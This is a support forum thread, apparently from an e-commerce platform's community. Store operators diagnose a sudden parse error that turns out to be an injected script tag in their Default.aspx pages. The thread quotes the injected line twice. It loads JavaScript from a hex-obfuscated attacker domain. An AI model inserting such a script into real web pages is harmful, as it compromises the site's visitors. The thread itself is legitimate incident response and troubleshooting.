Parse Error - URGENT - Please help

[nfortune]

Hello all,

All in a sudden this morning, we are getting the following errors from our homepage. We did not make any customization this past couple of days.

It only happen for the Default.aspx . If I go directly to product detail page, the page loads fine.

Which file(s) should I look at the fix the error?


Server Error in '/' Application.
--------------------------------------------------------------------------------

Parser Error
Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.

Parser Error Message: Only Content controls are allowed directly in a content page that contains Content controls.

Source Error:


Line 65: </tr>
Line 66: </table>
Line 67: </asp:Content><script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>



Source File: /Admin/Default.aspx Line: 67


Many Thanks!

[mazhar]

Did you injected some javascript in some scriptlet or page? Could you post your store URL.

[sohaib]

Can you please post the full source of your Default.aspx file?

[nfortune]

Sohaib,

Here you go the full source of the Default.aspx

<%@ Page Language="C#" MasterPageFile="~/Layouts/Scriptlet.master" Inherits="CommerceBuilder.Web.UI.AbleCommercePage" Title="xxx" %>
<%@ Register Assembly="CommerceBuilder.Web" Namespace="CommerceBuilder.Web.UI.WebControls.WebParts" TagPrefix="cb" %>
<asp:Content runat="server" ContentPlaceHolderID="PageContent">
<cb:ScriptletPart ID="HomePage" runat="server" Layout="Three Column" Content="Home Page" Sidebar="Standard Sidebar 1" Sidebar2="Standard Sidebar 2" Header="Standard Header" Footer="Standard Footer" Title="Home Page" AllowClose="False" AllowMinimize="false" />
</asp:Content>

[mazhar]

Did you have any piece of javascript in your scriptlets that are used on default page or may be you have some conlib control that is trying to inject javascript.

[nfortune]

mazhar,

There might be javascripts here and there, but we haven't been making any changes to the code this past couple of days. I would assume that they are OK for now.

It seems like all the 'Default.aspx" pages throughout the site is giving us this error. What are the files that every "Default.aspx" are sharing in Ablecommerce?

Thanks!

[sohaib]

Sohaib,

Here you go the full source of the Default.aspx

<%@ Page Language="C#" MasterPageFile="~/Layouts/Scriptlet.master" Inherits="CommerceBuilder.Web.UI.AbleCommercePage" Title="xxx" %>
<%@ Register Assembly="CommerceBuilder.Web" Namespace="CommerceBuilder.Web.UI.WebControls.WebParts" TagPrefix="cb" %>
<asp:Content runat="server" ContentPlaceHolderID="PageContent">
<cb:ScriptletPart ID="HomePage" runat="server" Layout="Three Column" Content="Home Page" Sidebar="Standard Sidebar 1" Sidebar2="Standard Sidebar 2" Header="Standard Header" Footer="Standard Footer" Title="Home Page" AllowClose="False" AllowMinimize="false" />
</asp:Content>

And what is exact error that you get on this particular page? I suppose this source of your home page.

[nfortune]

It appears that our server has been hacked! All the Default.aspx were injected with the offended javascript code!

[nickc]

I'd agree, given that the javascript call is to "lndex.net" and resolves to an IP in Beijing...

[calvis]

This is scary.

[AbleMods]

I just got a call from an AC7 customer with the exact same symptoms

[nfortune]

Joe,

Can you tell me which AC build your customer is running on? We are running on a relatively old build, I'm just wondering if the latest security fixes from AC will fix the problem.

Thanks!

[AbleMods]

SolunarServices,

Can you tell me which AC build your customer is running on? We are running on a relatively old build, I'm just wondering if the latest security fixes from AC will fix the problem.

Thanks!

AC7 Final Build 10125 using DiscountASP.Net as the hosting provider.

[Katie]

Last November, we released an "Important Security Update" as part of Service Release 2. It includes changes that should prevent any SQL injection attacks.

http://help.ablecommerce.com/upgrades/A ... ce_7.0.htm

Since then, we have also released SR3 which is includes everything from SR1 and up.

http://help.ablecommerce.com/upgrades/a ... ease_3.htm

It's really important to keep your installs current...

[throttlenet]

We have just experienced this same error and are restoring our site from backup. We have reviewed the database to confirm but this is not a SQL Injection attack. This is a file attack and the SQL has not been compromised.

This vulnerability was able to loop through every folder and subfolder in our store. It added the already mentioned script tag to every single .aspx page and completely replaced the text in all html pages.

We are restoring from backup currently and working to ensure all latest service releases are applied. We will post further if we continue to experience issues.

[AbleMods]

FTP password was probably compromised.

[throttlenet]

FTP password was probably compromised.

We were compromised again almost like clockwork exactly one week later from my original post. We changed our FTP username and password, applied all security updates and we still were compromised.

Doing some research leads us to the conclusion that somehow the attacker is using the store API to re-write files that are not meant be re-written.

Without being able to see the details of the Scrtiplet and ScriptletType objects, I am guessing they are using the something like the EditScriplet.aspx module to do this. Viewing the source shows that parameters are sent through the querystring to modify content.

i.e. EditScriptlet.aspx?s=Category+Grid+Page+with+Basket+Options&t=Content


With this information exposed in this manner, it is conceivable a session could be hijacked and that the attacker could be using this funcationality to do some malicious things.

One other thing that points to a bug in AbleCommerce is that we run our own hosting servers servicing hundreds of customers. This is the only site that was compromised and one of the (if not) only site that has file re-writing features. I would think that if the attacker could get down to the level to write files through IIS or FTP, they would have targeted more than one specific site.

I think this is a security issue in the code that needs to be patched immediately. I am anticipating getting hacked again this friday.

Please understand, I am not trying to point fingers, I just want to be part of the solution. I think there is a major issue here and want to provide confidence to my customers.

Thank you.

[nickc]

An attack of that nature would show up in weblogs. Any clues there?
Looking for IP source is a good place to start - here's the netblock info for the injected script target:

Code: Select all

lndex.net. A 219.152.120.182 

inetnum:      219.151.128.0 - 219.153.255.255
netname:      CHINANET-CQ
descr:        CHINANET Chongqing  province network
descr:        China Telecom
descr:        A12,Xin-Jie-Kou-Wai Street
descr:        Beijing 100088

[Logan Rhodehamel]

An attack of that nature would show up in weblogs. Any clues there?
Looking for IP source is a good place to start - here's the netblock info for the injected script target:

Any information from the weblog that can help identify the source of compromise would be immensely helpful. Could you send to me the weblog from the day of the compromise? If we can confirm this issue and discover the source, producing a patch would be an immediate priority.

[Logan Rhodehamel]

Source Error:
Line 65: </tr>
Line 66: </table>
Line 67: </asp:Content><script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>

Based on this I do not think it has to do with the scriptlet editor. From this snippet, it appears the script tag has been injected into the default.aspx file somehow.

In addition to weblogs, it would be helpful for us to have a copy of the compromised site files. That way I could locate where the injection is physically being placed. As much detail as I can possibly get will help me to track the issue. As of right now, I can't say for certain whether it is specific to AbleCommerce or not.

Anyone with this situation occuring may contact me via PM.

[throttlenet]

We are reviewing our web logs to see if we can dig out some information and will send it as soon as we can find relevant information.

In our situation we host multiple sites and domains and this is the only compromise we have had. This particular store is very highly ranked in Google and my guess is the URL was found with a BotNet and identified for attack. There is an exploit out right now that is doing this which is occurring for others as well. There is a recent article on Experts Exchange detailing this as well but I am not sure the article has really posted an answer. This attack inserting Lndex.net appears fairly new and we are continuing to search for more information on how the exploit occurs.

[throttlenet]

New finding, the URL in the script this time around translates to a url 51ofnet.net instead of lndex.net. Don't know if this helps, but it was different.

Thanks

[Logan Rhodehamel]

I have removed some posts in this thread that were sensitive. The root cause is still being investigated.